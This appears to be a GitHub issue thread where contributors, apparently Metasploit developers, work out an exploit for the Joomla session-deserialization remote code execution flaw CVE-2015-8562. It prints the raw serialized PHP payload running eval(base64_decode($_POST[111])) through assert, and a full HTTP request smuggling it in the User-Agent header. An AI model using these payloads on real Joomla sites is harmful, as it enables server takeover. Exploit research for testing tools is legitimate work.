Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[Request] Critical 0day RCE in Joomla (CVE-2015-8562) #6347

Closed
madmike33 opened this issue Dec 14, 2015 · 104 comments
Closed

[Request] Critical 0day RCE in Joomla (CVE-2015-8562) #6347

madmike33 opened this issue Dec 14, 2015 · 104 comments

Comments

@madmike33
Copy link

@madmike33 madmike33 commented Dec 14, 2015

@jvoisin r u interested mate

This is a serious vulnerability that can be easily exploited and is already in the wild. http://hubs.ly/H01B2K20

@wvu-r7
Copy link
Member

@wvu-r7 wvu-r7 commented Dec 14, 2015

Thank you, @madmike33. Looks much better, lol.

@madmike33
Copy link
Author

@madmike33 madmike33 commented Dec 14, 2015

Agree 😁

@madmike33 madmike33 closed this Dec 14, 2015
@madmike33 madmike33 reopened this Dec 14, 2015
@madmike33
Copy link
Author

@madmike33 madmike33 commented Dec 14, 2015

@wvu-r7 how about some labels

@FireFart
Copy link
Contributor

@FireFart FireFart commented Dec 14, 2015

Changes from this version:
joomla/joomla-cms@3.4.5...3.4.6

@FireFart
Copy link
Contributor

@FireFart FireFart commented Dec 14, 2015

@wvu-r7
Copy link
Member

@wvu-r7 wvu-r7 commented Dec 14, 2015

@madmike33
Copy link
Author

@madmike33 madmike33 commented Dec 14, 2015

@FireFart tu,interesting its alla bout uploading the payload in the tokens,if iam not wrong

@FireFart
Copy link
Contributor

@FireFart FireFart commented Dec 14, 2015

This seems to be the raw payload:

}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:60:\x22eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\x22;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}\xF0\x9D\x8C\x86

cc @brandonprry

@brandonprry
Copy link
Contributor

@brandonprry brandonprry commented Dec 14, 2015

I am very close, give me an hour or so.

@madmike33
Copy link
Author

@madmike33 madmike33 commented Dec 14, 2015

@brandonprry waiting to be the firsr one to test it :)

@FireFart
Copy link
Contributor

@FireFart FireFart commented Dec 14, 2015

@brandonprry great! i need to get some sleep will check it tomorrow morning in about 6 hours

@brandonprry
Copy link
Contributor

@brandonprry brandonprry commented Dec 15, 2015

It takes two requests;

One to put the tainted data in the db.
One to pull the tainted data out and deserialize.

(I think)

I have not gotten full RCE yet, but sending this request a few times will yield a 500 error.

GET / HTTP/1.1
Host: 192.168.0.20
User-Agent: }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:36:"sleep(5);JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}�
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: cdfc0c865832b045d476c0eaba383ddc=97ot8pr8bcvicvtt9vvi8mdk04;
Connection: keep-alive
Content-Length: 0

The error in the log is:

[Mon Dec 14 18:06:35.518826 2015] [:error] [pid 11184] [client 192.168.0.10:51041] PHP Warning: session_start(): Failed to decode session object. Session has been destroyed in /var/www/html/libraries/joomla/session/session.php on line 665

Still working on getting the payload to work correctly. It is obvious the intent, but something seems to be missing...

@brandonprry
Copy link
Contributor

@brandonprry brandonprry commented Dec 15, 2015

Ah, extra info, the data you are manipulating is in the *_session table in the 'data' column.

Also, that payload should sleep for 5 seconds on the second request if it worked.

@kendyhikaru
Copy link

@kendyhikaru kendyhikaru commented Dec 15, 2015

@brandonprry wait your info.

@brandonprry
Copy link
Contributor

@brandonprry brandonprry commented Dec 15, 2015

The 500 error I am getting seems completely unrelated and is a Duplicate entry exception.

exception 'RuntimeException' with message 'Duplicate entry '' for key 'PRIMARY' SQL=INSERT INTO `hjesv_session`
(`session_id`, `client_id`, `time`) VALUES 
('', 0, '1450143682')' in /var/www/html/libraries/joomla/database/driver/mysqli.php:610
Stack trace:
#0 /var/www/html/libraries/cms/application/cms.php(208): JDatabaseDriverMysqli->execute()
#1 /var/www/html/libraries/cms/application/cms.php(767): JApplicationCms->checkSession()
#2 /var/www/html/libraries/cms/application/cms.php(131): JApplicationCms->loadSession()
#3 /var/www/html/libraries/cms/application/site.php(63): JApplicationCms->__construct(NULL, NULL, NULL)
#4 /var/www/html/libraries/cms/application/cms.php(401): JApplicationSite->__construct()
#5 /var/www/html/libraries/joomla/factory.php(125): JApplicationCms::getInstance('site')
#6 /var/www/html/index.php(42): JFactory::getApplication('site')
#7 {main}Error displaying the error page:

Still working. Not sure if they are related or not, but one (the error.log session error) always happens with the other (SQL exception for duplicate value).

I think they are related in that the session is not being deserialized correctly coming out of the DB so Joomla decides to write the cookie again, but it already exists.

@brandonprry
Copy link
Contributor

@brandonprry brandonprry commented Dec 15, 2015

They are not related.

EDIT: I might have spoken too soon.

@FireFart
Copy link
Contributor

@FireFart FireFart commented Dec 15, 2015

@brandonprry so exactly how far I got :(

@wvu-r7
Copy link
Member

@wvu-r7 wvu-r7 commented Dec 15, 2015

I poked at this on my own... and got equally as far, lol.

@wvu-r7
Copy link
Member

@wvu-r7 wvu-r7 commented Dec 15, 2015

Think I got it.

@FireFart
Copy link
Contributor

@FireFart FireFart commented Dec 15, 2015

so it seems the exploit works like some session injection. It puts in a new session identifier __test (instead of the normal __default) with serialized data. I think we only need to find a call which unserializes the whole session object in a second request. https://github.com/joomla/joomla-cms/blob/3.4.5/libraries/joomla/session/session.php#L479

@wvu-r7
Copy link
Member

@wvu-r7 wvu-r7 commented Dec 15, 2015

Gonna put together a PoC... hope it's not a fluke!

@FireFart
Copy link
Contributor

@FireFart FireFart commented Dec 15, 2015

@wvu-r7 👯 so send it over for testing :D

@wvu-r7
Copy link
Member

@wvu-r7 wvu-r7 commented Dec 15, 2015

Doh! Looks like a false alarm. Perhaps using a time-based attack wasn't ideal, since I happened to get the expected delay repeatedly. :(

@madmike33
Copy link
Author

@madmike33 madmike33 commented Dec 15, 2015

So anything new so far guys,the thing is in the payload according to sucuri they modified the payload, @wchen-r7 any idea from ur side too?

@wvu-r7
Copy link
Member

@wvu-r7 wvu-r7 commented Dec 15, 2015

Yeah, we're missing some critical details here, so there's a lot of code reading and experimentation going on. Wonder how close @brandonprry is now.

@icehteam
Copy link

@icehteam icehteam commented Dec 15, 2015

Anybody with good knowledge of OOP's can execute this , I'm still trying.. anyone using skype..??
add me base64_decode('bXIuY2h1cmNobDMzdA=='); lol

@madmike33
Copy link
Author

@madmike33 madmike33 commented Dec 15, 2015

ye its a good idea we can make a group and evryone give his idea in skype @icehteam

@cyadron
Copy link

@cyadron cyadron commented Dec 15, 2015

@shargon Do you mean that the next time you reload that page, session info is read from the databse and deserialized and the object is executed?

@shargon
Copy link

@shargon shargon commented Dec 15, 2015

@cyadron yes,i thought is like this, for run the exploit, Its necessary make 2 calls, one per poison, two per execution

The execution part its simple, joomla deserialize the session and run the poison...

The hard work its do the correct payload for exploit it

@madmike33
Copy link
Author

@madmike33 madmike33 commented Dec 15, 2015

yes what @cyadron said is true we need to cals also as @brandonprry perry stated earlier

@FireFart
Copy link
Contributor

@FireFart FireFart commented Dec 15, 2015

guys please use IRC or Skype for discussing this exploit this issue is getting too big and too offtopic

@icehteam
Copy link

@icehteam icehteam commented Dec 15, 2015

My skype is base64_decode('bXIuY2h1cmNobDMzdA=='); , Let me know urs folks.

@shargon
Copy link

@shargon shargon commented Dec 15, 2015

@madmike33
Copy link
Author

@madmike33 madmike33 commented Dec 15, 2015

👍 @shargon

@cyadron
Copy link

@cyadron cyadron commented Dec 15, 2015

The code from freebuf gives an error:
assert(): Assertion "eval(base64_decode($_POST[111]));JFactory::getConfig();exit;" failed

@borismattijssen
Copy link

@borismattijssen borismattijssen commented Dec 15, 2015

edit:
decided to remove the screenshot as I just posted it out of excitement not to brag or anything. I'm glad the issue is closed and the shiny module will be there soon.

@jstnkndy
Copy link
Contributor

@jstnkndy jstnkndy commented Dec 15, 2015

@borismattijssen What's the purpose of posting a screenshot but no technical details?

@borismattijssen
Copy link

@borismattijssen borismattijssen commented Dec 15, 2015

@jstnkndy I feel like the vulnerability is too young to share the technical details on the internet..

@FireFart
Copy link
Contributor

@FireFart FireFart commented Dec 15, 2015

lol

@jstnkndy
Copy link
Contributor

@jstnkndy jstnkndy commented Dec 15, 2015

so the screenshot is just.... bragging?

@borismattijssen
Copy link

@borismattijssen borismattijssen commented Dec 15, 2015

just showing it isn't that hard..

@falconz
Copy link

@falconz falconz commented Dec 15, 2015

@borismattijssen I see vulnerable in user agent or xfowarder, why do you hidden URI?

@HackerOnTwoWheels
Copy link

@HackerOnTwoWheels HackerOnTwoWheels commented Dec 15, 2015

@falconz my guess, it is not a private address lol

@FireFart
Copy link
Contributor

@FireFart FireFart commented Dec 15, 2015

closing this because the details are public available and a module is also ready

@FireFart FireFart closed this Dec 15, 2015
@wchen-r7
Copy link
Contributor

@wchen-r7 wchen-r7 commented Dec 15, 2015

@FireFart In your commit, I recommend just do Resolve #6347. That way when your PR lands, this issue automatically tags and closes it. And if you want to end the conversation early, I guess we can try to lock it (it is a button for me).

@wvu-r7
Copy link
Member

@wvu-r7 wvu-r7 commented Dec 17, 2015

Module merged in #6355. Btw, here's why we were failing: #6355 (comment). :-)

@wchen-r7 wchen-r7 changed the title [Request] Critical 0day RCE in joomla [Request] Critical 0day RCE in Joomla (CVE-2015-8562) Dec 17, 2015
@s1m096
Copy link

@s1m096 s1m096 commented Dec 18, 2015

Does not work with me...

@ggg4566
Copy link

@ggg4566 ggg4566 commented Dec 19, 2015

Does not work to version below 3.x , need find other trick

@bgeesaman
Copy link

@bgeesaman bgeesaman commented Dec 20, 2015

Try one of the generic/shell or php/exec payloads. Do those work for you? I can get those to work, but not the php meterpreter variants on the three systems I built to test this on.

@JohnMartinelli
Copy link

@JohnMartinelli JohnMartinelli commented Dec 20, 2015

If this needs CODE to be solved, then I WANT TO TAKE FULL RESPONSIBILITY
FOR CODING THE FIXES as I have never contributed to an open source
project (big one, at least) directly. :)

So... tell me exactly what you need me to code.

On Saturday 19 December 2015 09:08 PM, bgeesaman wrote:

Try one of the generic/shell or php/exec payloads. Do those work for
you? I can get those to work, but not the php meterpreter variants on
the three systems I built to test this on.


Reply to this email directly or view it on GitHub
#6347 (comment).

@icehteam
Copy link

@icehteam icehteam commented Dec 20, 2015

@ggg4566 X-Forward working in 3x , You need use user agent for some versions. @JohnMartinelli your late at the party fff...

@am06
Copy link

@am06 am06 commented Dec 21, 2015

I've read that a session_decode() bug is needed for this to work....? Anyone can please tell me what's that bug about?

@VivekShingala
Copy link

@VivekShingala VivekShingala commented Oct 6, 2017

Is this error harmful for other frameworks like codeigniter or core php websites? Have found these logs in such frameworks. I do not use Joomla for most of the sites, however, still find this logs.

If yes, what steps to be taken to prevent?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked pull requests

Successfully merging a pull request may close this issue.

None yet
You can’t perform that action at this time.